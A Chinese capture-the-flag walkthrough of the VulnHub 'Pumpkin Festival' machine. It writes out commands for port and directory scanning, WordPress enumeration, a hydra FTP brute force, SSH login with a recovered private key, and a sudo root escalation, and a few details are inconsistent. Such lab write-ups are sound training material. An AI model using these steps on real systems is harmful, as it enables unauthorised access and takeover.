https://download.vulnhub.com/missionpumpkin/PumpkinFestival.ova靶机下载
一,信息收集
1、查看靶机的mac地址:
2、查看靶机的ip地址:
nmap 192.168.13.0/24
3、扫描靶机开放端口的详细信息,发现ftp有一个用户名可以连接Anonymous:
nmap -p- -sC -sT -sV -A 192.168.13.152
4、访问靶机的80端口:
5、对网站进行目录扫描,查找有用信息:
dirsearch -u "http://192.168.13.155/"
6、拼接访问查看信息,发现页面都是空的:
7、80端口几乎没有什么信息,尝试使用前面扫描出来的用户Anonymous进行ftp连接:
ftp 192.168.13.155
Anonymouse
123456
8、成功登录之后查看是否有有用信息文件,看到有个token.txt,下载在本地查看:
得到一个token:2d6dbbae84d724409606eddd9dd71265
9、再次访问80端口:
页面大概意思获取token以及提到了用户jack和harry
10、查看网页源代码:
获得第二个token:45d9ee7239bc6b0bb21d3f8e1c5faa52
11、拼接查看一下robots.txt文件:
12、拼接查看一下这几个路径:
13、找到一个域名pumpkins.local,修改hosts文件:
14、再次访问80端口:
得到第三个token:06c3eb12ef2389e2752335beccfb2080
15、查看页面源代码,是wordpress:
16、使用wpscan扫描一下网站:
发现了admin和morse用户,还有readme.html以及其他几个页面
wpscan --url http://pumpkins.local -e at -e ap -eu
17、拼接readme.html页面进行访问:
K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s解码后
找到morse & jack的密码Ug0t!TrIpyJ
18、拼接wp-login.php页面使用morse:Ug0t!TrIpyJ成功登录:
后台获取到第四个token:7139e925fd43618653e51f820bc6201b
19、由于我们还有一个名为admin 的用户,之前第一个页面有一个的关键字!Alohomora!我们尝试用其进行登录,成功登录:
发现第五个token:f2e00edc353309b40e1aed18e18ab2c4
20、对pumpkins.local进行目录扫描,查看是否有有用信息:
dirsearch -u "http://pumpkins.local/"
21、拼接访问目录信息:
找到第六个token:5ff346114d634a015ce413e1bc3d8d71
22、之前我们获取到了四个用户分别是admin、morse、jack、harr,前三个用户都有密码了,第四个用户尝试使用hydra爆破:
hydra -l harry -P passwds.txt -t 10 -vV -e ns 192.168.13.155 ftp -f
账号和密码为:harry:yrrah
23、使用账号密码进行连接ftp:
24、查看一下txt文件内容:
发现第七个token:ba9fa9abf2be9373b7cbd9a6457f374e
25.尝试匿名登录
得到第八个token:2d6dbbae84d724409606eddd9dd71265
26.目录 Donotopen 中,一通遍历,发现 token.txt,下载查看
发现第九个token:f9c5053d01e0dfc30066476ab0f0564cgetshell
1.进入刚才的 NOOOOO 目录,进入后,再次进入 NOOOOOO 目录,发现一个 data.txt
2.下载查看
3.发现是乱码,查看文件类型
4.解压,最后 jack 为十六进制文件
5.使用 xxd 将 hexdump 转换,得到一个私钥
xdd -r -p jack
6.复制内容至 aaa,赋予权限后,进行 ssh 连接
chmod 600 aaa
ssh -i aaa jack@192.168.42.195 -p 6880
连接成功
提权
1.查看当前用户权限,密码 Ug0t!TrIpyJ
2.查询到pumpkins 目录下 alohomora 文件有root权限
mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash
chmod 777 alohomora
sudo ./alohomora
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
